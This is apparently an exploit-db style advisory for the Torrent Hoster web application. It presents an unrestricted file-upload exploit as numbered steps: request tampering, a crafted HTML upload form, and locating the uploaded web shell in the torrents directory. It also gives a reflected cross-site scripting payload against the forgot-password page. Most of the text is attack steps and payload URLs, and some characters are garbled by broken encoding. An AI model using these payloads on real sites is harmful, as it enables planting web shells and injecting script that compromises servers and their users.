======================================================================================== | # Title: Torrent Hoster Remont Upload Exploit | # Author : El-Kahina | # Home : www.h4kz.com| | # Script : Powered by Torrent Hoster. | # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu) | # Bug: Upload | ======================Exploit By El-Kahina ================================= # Exploit: 1 - use tamper data : http://127.0.0.1/torrenthoster//torrents.php?mode=upload 2- <center> Powered by Torrent Hoster <br /> <form enctype="multipart/form-data" action="http://127.0.0.1/torrenthoster/upload.php" id="form" method="post" onsubmit="a=document.getElementById('form').style;a.display='none';b=document.getElementById('part2').style;b.display='inline';" style="display: inline;"> <strong>���� ��� ����� �� ��:</strong> <?php echo $maxfilesize; ?>��������<br /> <br> <input type="file" name="upfile" size="50" /><br /> <input type="submit" value="��� �����" id="upload" /> </form> <div id="part2" style="display: none;">��� ��� ����� .. �� ���� �����</div> </center> 3 - http://127.0.0.1/torrenthoster/torrents/(to find shell) 4 - Xss: http://127.0.0.1/torrenthoster/users/forgot_password.php/>"><ScRiPt>alert(00213771818860)</ScRiPt> ========================================== Greetz : Exploit-db Team all my friend :(Dz-Ghost Team ) im indoushka's sister ------------------------------------------
体验盒子
